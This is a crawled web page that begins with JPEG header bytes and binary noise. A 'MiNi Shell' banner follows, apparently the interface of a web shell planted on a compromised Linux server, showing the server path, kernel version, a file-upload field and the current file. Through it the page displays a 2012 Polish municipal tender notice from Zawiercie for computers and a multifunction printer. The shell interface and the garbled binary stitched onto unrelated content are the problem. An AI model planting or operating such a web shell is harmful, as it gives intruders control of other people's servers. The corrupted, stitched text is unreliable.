JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/201281-N-2012.html

<p class="kh_header"><b>Zawiercie: Dostawa sprzętu komputerowego wraz z oprogramowaniem (pakiet (część) I) oraz 1 szt. cyfrowego urządzenia powielająco - drukująco - skanującego (pakiet (część) II) dla Urzędu Miejskiego w Zawierciu.</b><br>
<b>Numer ogłoszenia: 201281 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem (pakiet (część) I) oraz 1 szt. cyfrowego urządzenia powielająco - drukująco - skanującego (pakiet (część) II) dla Urzędu Miejskiego w Zawierciu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego wraz z oprogramowaniem (pakiet (część) I) oraz 1 szt. cyfrowego urządzenia powielająco - drukująco - skanującego (pakiet (część) II) dla Urzędu Miejskiego w Zawierciu.
PAKIET (CZĘŚĆ) I:
- PODPAKIET I: 
X Zestaw komputerowy (19 sztuk) w konfiguracji nie gorszej niż:
Lp.	Podzespół	Parametry/wymagania minimalne
1)		Procesor	Procesor musi uzyskiwać w teście Passmark CPU Mark wynik co najmniej 2926 punktów (wynik zaproponowanego procesora musi być opublikowany na stronie http://www.cpubenchmark.net/) na dzień 19.09.2012 r. (w załączeniu SIWZ wydruk ze strony z tej daty).
2)		Płyta główna	Obsługa procesora jak wyżej
Chipset dostosowany do oferowanego procesora, 
1 slot PCI-Express x16, 
3 x slot PCI-E 1x
2 złącza DIMM, obsługa do 4096 mB  pamięci RAM, 
kontroler SATA II (dla min. 3 urządzeń)
Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, Wbudowana karta sieciowa 10/100/1000Mbit/s, Ethernet RJ 45,1x HDMI, min. 8 x USB w tym min. 2 z przodu obudowy; wymagana ilość portów nie może być uzyskana poprzez stosowanie przejściówek lub kart PCI
3)		Karta graficzna	Zintegrowana, z możliwością dynamicznego przydzielenia pamięci w obrębie pamięci systemowej ze wsparciem dla DirectX 10, API i OpenGL 2.0, 
4)		Dysk twardy	Pojemność: min. 500 GB
5)		Pamięć RAM	Pojemność pamięci: 4096 MB
6)		Klawiatura	Klawiatura USB w układzie polski programisty 
7)		Mysz	Mysz laserowa USB z sześcioma klawiszami oraz rolką (scroll) min 1000dpi
8)		Napęd optyczny	Odczyt DVD-ROM - 16 x
Odczyt CD-ROM - 48 x
9)		Obudowa	Typ obudowy: midi Tower
Moc zasilacza: max 300 W 
10)		Oprogramowanie systemowe	Microsoft Windows 7 Professional 64-bit PL lub równoważne.
Dołączony nośnik z oprogramowaniem
11)		Dołączone wyposażenie	Czytnik kart pamięci 19-in-1

12)		Inne	Niezbędne sterowniki i oprogramowanie na płycie CD/ DVD. 
- Microsoft Windows 7 Professional 64-bit PL lub równoważny
- Deklaracja CE (należy załączyć przy dostawie  dokument potwierdzający spełnienie wymogu)
13)		Gwarancja	3-letnia gwarancja producenta świadczona na miejscu u klienta 
Czas reakcji serwisu - do końca następnego dnia roboczego
Naprawa zakupionego towaru powinna być dokonana w terminie dwóch dni roboczych licząc od dnia otrzymania zawiadomienia o usterce albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).
Gwarancja producenta komputera. 
W przypadku konieczności wymiany lub naprawy sprzętu dysk twardy musi pozostać u Zamawiającego.

X Laptop (1 sztuka) w konfiguracji nie gorszej niż:

LP.	Podzespół	Parametry/wymagania minimalne
1.		Procesor	Procesor o wydajności nie gorszej niż 3864 pkt. w teście Passmark http://www.cpubenchmark.net na dzień 19.09.2012 r. (w załączeniu SIWZ wydruk ze strony z tej daty). 
2.		Karta graficzna	Zintegrowana z możliwością dynamicznego przydzielenia do min. 512 MB,                    ze sprzętowym wsparciem dla DirectX 10.0, Shader 4.0.
3.		Dysk twardy	Pojemność: min. 500 GB

4.		Pamięć RAM	4 GB  z możliwością rozbudowy do 8GB
5.		  Wyświetlacz:	15,6 cali HD LED 
6.		  Sieć:	Karta sieciowa 10/100/1000 Mbps Gigabit Ethernet
Karta WiFi 802.11b/g

7.		  Napędy:	Wbudowany napęd DVD+/-RW/RAM
8.		Bezpieczeństwo	Czytnik linii papilarnych z oprogramowaniem
Złącze typu Kensington Lock
9.		Łączność bezprzewodowa	Wireless LAN 802.11a/ b/g/n  z dedykowanym przełącznikiem umożliwiający włączenie/wyłączenie łączności bezprzewodowej
Bluetooth
10.		 Wprowadzanie     danych:	Pełnowymiarowa klawiatura,  Touchpad 240 CPI

11.		  Porty:	3 x USB 2.0 w tym jedno USB o funkcjonalnosci eSATA,1x USB 3.0, złącze słuchawek, złącze mikrofonu, HDMI, RJ-45, VGA, kamera HD y mikrofonem, czytnik kart pamięci, Gniazdo Express Card
12.		  Karta dźwiękowa:	Karta dźwiękowa zgodna z HD Audio, głośniki stereo.
13.		Oprogramowanie systemowe	Windows  7 Professional w wersji 64-bitowej, licencja + nośnik z oprogramowaniem lub równoważne.
14.		Inne	Niezbędne sterowniki i oprogramowanie na płycie CD/ DVD. 
Deklaracja CE (należy załączyć przy dostawie  dokument potwierdzający spełnienie wymogu).
15.		Gwarancja	3-letnia gwarancja producenta świadczona na miejscu u klienta. 
Czas reakcji serwisu - do końca następnego dnia roboczego.
Naprawa zakupionego towaru powinna być dokonana w terminie dwóch dni roboczych licząc od dnia otrzymania zawiadomienia o usterce albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).
Gwarancja producenta komputera. 
W przypadku konieczności wymiany lub naprawy sprzętu dysk twardy musi pozostać u Zamawiającego.

- PODPAKIET II - Zestaw komputerowy (2 sztuki) w konfiguracji nie gorszej niż: 
LP.	Podzespół	Parametry/wymagania minimalne
1.		Procesor	Procesor musi uzyskiwać w teście Passmark CPU Mark wynik co najmniej 7071 punktów (wynik zaproponowanego procesora musi być opublikowany na stronie http://www.cpubenchmark.net/) na dzień 19.09.2012 r. (w załączeniu SIWZ wydruk ze strony z tej daty).
2.		Płyta główna	Obsługa procesora jak wyżej
Chipset dostosowany do oferowanego procesora
2 złącza pełnowymiarowe PCI Express x16
4 złącza DIMM, obsługa do 32GB pamięci RAM,
kontroler SATA II (dla min. 3 urządzeń)
1 złącze eSata
Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition,
10/100/1000 Ethernet RJ 45, Min. 10 x USB, w tym 10 portów wyprowadzonych na zewnątrz komputera: min. 4 x USB 2.0 (tylny panel), 2 x USB 2.0 (przedni panel), 2 x USB 3.0 (tylny panel), 2 x USB 3.0 (przedni panel)  , port sieciowy RJ-45, porty słuchawek i mikrofonu na przednim oraz tylnym panelu obudowy. Wymagana ilość i rozmieszczenie (na zewnątrz obudowy komputera) portów USB nie może być osiągnięta w wyniku stosowania konwerterów, przejściówek itp.
3.		Karta graficzna	Zewnętrzna, z 1GB pamięci własnej, Obsługa DirectX 10.1
4.		Dysk twardy	Pojemność: min. 1 TB
5.		Pamięć RAM	Pojemność pamięci: 6 144 MB
6.		Klawiatura	Klawiatura USB w układzie polski programisty
7.		Mysz	Mysz laserowa USB z sześcioma klawiszami oraz rolką (scroll) min 1000dpi
8.		Napęd optyczny	Nagrywarka DVD +/-RW wraz z oprogramowaniem do nagrywania płyt
9.		Obudowa	Typ obudowy: midi Tower
Moc zasilacza: max 350 W
10.		Oprogramowanie systemowe	Microsoft Windows 7 Professional 64-bit PL lub równoważne.
Dołączony nośnik z oprogramowaniem
11.		Oprogramowanie biurowe	Office 2010 dla Użytkowników Domowych i Małych Firm OEM PL lub równoważne.

12.		Dołączone wyposażenie	Czytnik kart pamięci 19-in-1

13.		Inne	Niezbędne sterowniki i oprogramowanie na płycie CD/ DVD.
Microsoft Windows 7 Professional 64-bit PL lub równoważny
Deklaracja CE (należy załączyć przy dostawie  dokument potwierdzający spełnienie wymogu)
14.		Gwarancja	3-letnia gwarancja producenta świadczona na miejscu u klienta.
Czas reakcji serwisu - do końca następnego dnia roboczego.
Naprawa zakupionego towaru powinna być dokonana w terminie dwóch dni roboczych licząc od dnia otrzymania zawiadomienia o usterce albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).
Gwarancja producenta komputera.
W przypadku konieczności wymiany lub naprawy sprzętu dysk twardy musi pozostać u Zamawiającego.
15.		Monitor LCD
(2 szt.)	Przekątna ekranu: Ekran ciekłokrystaliczny z aktywną matrycą TFT 22 cale
Rozdzielczość nominalna: 1680 x 1050 piksele
Kontrast: 1000:1
Jasność: 250 cd/m2
Czas reakcji plamki: max. 5 ms
Kąt widzenia poziom/pion: 160 °/160 °
Ilość wyświetlanych kolorów:16,7 mln
Cyfrowe złącze DVI: tak
System podświetlenia LED
Spełniane normy jakościowe: ISO 13406-2 lub ISO 9241, Energy Star 5.2.

Zamawiający dopuszcza możliwość złożenia oferty przez Wykonawcę na dostawę przedmiotu zamówienia o parametrach równoważnych nie gorszych niż wymienione powyżej. Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ o parametrach technicznych, właściwościach eksploatacyjnych i funkcjonalnych nie gorszych niż te, podane pod pojęciem typu (art. 29 ust. 3 ustawy Prawo zamówień publicznych).

Z uwagi na wieloletnie korzystanie z wyspecyfikowanego oprogramowania lub wcześniejszych jego wersji, Zamawiający posiada zasoby zbiorów danych, dokumentów itd. oraz pracowników posiadających przeszkolenie i/lub nabyte doświadczenie w posługiwaniu się tym oprogramowaniem. Dlatego dla zapewnienia ciągłości pracy Urzędu - w przypadku dostarczenia oprogramowania równoważnego dla wymienionego w poniższych tabelach - Zamawiający będzie wymagał:
1)	przeniesienia danych, dokumentów, modeli, innych produktów wytworzonych przy pomocy dotychczas używanego oprogramowania do formatu natywnego dla dostarczonego oprogramowania równoważnego, przy zachowaniu wszystkich cech użytkowych tych produktów;
2)	konfiguracji środowisk pracy, w których to oprogramowanie będzie używane w taki sposób, by nie nastąpiło pozbawienie użytkowników możliwości, które posiadają obecnie lub które byłyby dostępne w przypadku oprogramowania wymienionego w wykazie poniżej;  
3)	przeprowadzenia szkoleń użytkowników w Urzędzie, gwarantujących nabycie przez nich umiejętności wykorzystywania dostarczonego oprogramowania.  

PAKIET II - Urządzenie wielofunkcyjne (cyfrowe urządzenie powielająco - drukująco - skanujące) kolorowe A3 - w konfiguracji nie gorszej niż:

Lp.	Parametry/wymagania minimalne
1.		Technologia Druku	Elektrostatyczna, laserowa
2.		Szybkość kopiowania/drukowania	A4: min 22 kopii/min
A3: min 12 kopii/min
3.		Rozdzielczość druku	Min. 1800 x 600 dpi
4.		Format oryginału	A5 - A3
5.		Powiększenie	co najmniej 16x, co 0,1%, niezależny w osi X                                                                                                                                 i Y dokumentu
6.		Szybkość skanowania	Min 65 stron/min w duplexie poprzez automatyczny podajnik dokumentów
7.		Tryby skanowania	sieciowe skanowanie TWAIN
skanowanie do e-mail, do FTP, do SMB, do skrzynki, do WebDAV, do DPWS, do USB
8.		Formaty plików	JPEG, TIFF, PDF, kompaktowy PDF, szyfrowany PDF, konturowy PDF, XPS, kompaktowy XPS
9.		Miejsca przeznaczenia zeskanowanych dokumentów	(pojedyncze + grupowe), obsługa LDAP
10.		Standard faksu (opcja)	Super G3 (opcjonalny)
11.		Przesyłanie faksu	analogowy, i-Fax, kolorowy i-Fax, faks IP, faks SIP
12.		Pamięć systemowa	Min. 2.048 MB
13.		Systemowy dysk twardy	Min 162 GB
14.		Interfejs	10/100/1000 Base-T Ethernet USB 2.0
15.		Protokoły sieciowe	TCP/IP (IPv4/IPv6) AppleTalk (EtherTalk) 
SMB
LPD
SNMP
HTTP
16.		Automatyczny podajnik dokumentów	Min. 100 oryginałów (80g/m2), duplex
17.		Wyświetlacz LCD	Dotykowy, kolorowy LCD
18.		Format papieru	 A6 - A3+
 papier transparentowy min: 1.200 x 295 mm
19.		Pojemność wejściowa	Min. 1 150 arkuszy
20.		Źródła podawania papieru	2 kasety uniwersalne po min. 500 arkuszy, A5 - A3, 64 - 256 g/m2
Podajnik ręczny: 150 arkuszy, A6 - A3+, rozmiary niestandardowe, transparenty, 64 - 271 g/m2
21.		Automatyczny druk dwustronny	TAK A5 - A3+ bez marginesów, 64 - 256 g/m2

Zamawiający uzna wszystkie parametry lepsze niż opisane w SIWZ i załączniku nr 3 A lub 3 B do SIWZ za zgodne ze specyfikacją.
Wykonawca zobowiązuje się na własny koszt i ryzyko dostarczyć do siedziby Zamawiającego przedmiot zamówienia. 
W dniu przekazania przedmiotu umowy zostanie sporządzony protokół odbioru.
Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 33.19.51.00-4, 30.21.31.00-6, 48.62.00.00-0, 48.90.00.00-7, 30.12.14.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany - w zakresie pakietu (części)  I wnieść wadium w wysokości: 1.000,00 zł, zaś w zakresie pakietu (części)  II - 200,00 zł.
2.	Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami punktu IX SIWZ i może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto: 

URZĄD MIEJSKI w ZAWIERCIU
BANK Pekao S.A.
KONTO: 74 1240 2975 1111 0010 4312 6805
z dopiskiem: wadium w postępowaniu przetargowym nr ZP.271.74.2012 - PAKIET (CZĘŚĆ) nr  (w zależności, na którą część (pakiet) Wykonawca składa ofertę należy wpisać I lub II).

Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku zamawiającego.

4.	Jeżeli wykonawca wnosi wadium w:
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym;
2)	gwarancjach bankowych;
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z  późn. zm.).

Oryginały dokumentów należy zdeponować w kasie Urzędu Miejskiego, a do oferty należy dołączyć poświadczoną za zgodność kserokopię.
W/w formy wadium muszą się znaleźć w kasie zamawiającego w terminie wyznaczonym
do składania ofert.
5.	Wadium wniesione w formach, o których mowa w pkt VIII ust. 4 SIWZ musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.

W szczególności zgodnie z art. 46 ust. 4a Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w pkt VI SIWZ lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 3 do specyfikacji.
2)	Opis techniczny przedmiotu zamówienia (wraz z kalkulacją ceny), sporządzony wg wzoru stanowiącego załącznik nr 3 A lub 3 B  do formularza oferty i SIWZ.
3)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 4 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	Między dniem złożenia oferty, a dniem dostarczenia towaru zaistnieje sytuacja, że zaoferowany towar nie będzie dostępny na rynku na skutek wycofania z produkcji pod warunkiem, że nowy towar będzie posiadał parametry techniczne nie gorsze niż towar wcześniej oferowany,
2)	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
